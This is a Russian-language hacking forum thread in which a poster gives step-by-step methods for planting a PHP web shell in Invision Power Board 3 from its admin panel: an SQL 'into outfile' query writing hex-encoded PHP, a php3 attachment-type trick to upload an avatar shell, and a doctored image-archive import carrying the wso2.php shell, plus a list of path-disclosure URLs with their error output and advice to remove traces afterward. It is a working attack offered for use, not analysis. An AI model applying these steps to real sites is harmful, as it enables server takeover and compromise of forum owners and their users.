Invision Power Board
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Invision Power Board - 2009-12-19 03:20:09.980000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):
вариант1:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос
select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'
полный путь можно посмотреть так:
->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO
шелл: http://site.ru/uploads/shell.php
PS: Нужны соответствующие права
вариант2:
Форумы->Прикрепляемые файлы->Типы файлов
жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.
Топаем в свой профиль:
http://site.ru/index.php?app=core&module=usercp&tab=members&area=avatar
грузим аву-шелл с расширением php3 и получаем шелл по адресу:
http://site.ru/uploads/av-1.php3
====================================
Раскрытие пути:
http://site.ru/index.php?app[]=core&module=usercp&tab=forums&area=watch&watch=topic&do=list&tid=1
Warning: Constants may only evaluate to scalar values in Z:\home\site.ru\www\admin\sources\base\ipsRegistry.php on line 1400
http://site.ru/index.php?app=core&module=usercp&tab[]=forums&area=watch&watch=topic&do=list&tid=1
Warning: Illegal offset type in isset or empty in Z:\home\site.ru\www\admin\sources\base\core.php on line 2141
http://site.ru/index.php?app=members§ion=view&module=list&showall=0&sort_key[]=members_display_name&sort_order=asc&max_results=20&app=members§ion=view&module=list&quickjump=A
Warning: Illegal offset type in isset or empty in Z:\home\site.ru\www\admin\applications\members\modules_public\list\view.php on line 234
http://site.ru/index.php?app=members§ion=view&module=list&showall=0&sort_key=members_display_name&sort_order[]=asc&max_results=20&app=members§ion=view&module=list&quickjump=A
Warning: Illegal offset type in isset or empty in Z:\home\site.ru\www\admin\applications\members\modules_public\list\view.php on line 235
http://site.ru/index.php?app=members§ion=view&module=list&showall=0&sort_key=members_display_name&sort_order=asc&max_results[]=20&app=members§ion=view&module=list&quickjump=A
Warning: Illegal offset type in isset or empty in Z:\home\site.ru\www\admin\applications\members\modules_public\list\view.php on line 237
http://site.ru/index.php?app=members§ion=view&module=list&showall=0&sort_key=members_display_name&sort_order=asc&max_results=20&app=members§ion=view&module=list&quickjump[]=A
Warning: urldecode() expects parameter 1 to be string, array given in Z:\home\site.ru\www\admin\applications\members\modules_public\list\view.php on line 297
|
|
|
|
|
RE: Invision Power Board - 2009-12-20 16:54:18.976666
|
|
|
Mipo
Сообщений: 123
Оценки: 0
Присоединился: 2009-11-11 21:01:00.566666
|
Спасибо, давно искал
|
|
|
|
|
RE: Invision Power Board - 2010-02-01 21:44:12.380000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Залитие шелла из админки IPB 3… (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха) - еще один вариант по аналогии с этим постом:
https://forum.antichat.ru/showpost.php?p=977862&postcount=10
но небольшие изменения:
1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый
2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"
3. Идем в нашу папочку (на примере Denwer)
C:\WebServers\home\drup614.ru\www\public\style_images\master
и суем туда наш любимый wso2.php
4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz
5. В архиве файлик images-master.xml
Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом
6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений
Рядом с
C:\WebServers\home\drup614.ru\www\public\style_images\master
появится
C:\WebServers\home\drup614.ru\www\public\style_images\master2
где будет лежать все тоже самое, плюс наш шелл
в итоге шелл будет по адресу:
http://forum.site.ru/public/style_images/master2/wso2.php
PS: не забудьте потом переместить шелл и удалить каталог master2
Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку
|
|
|
|
|
|
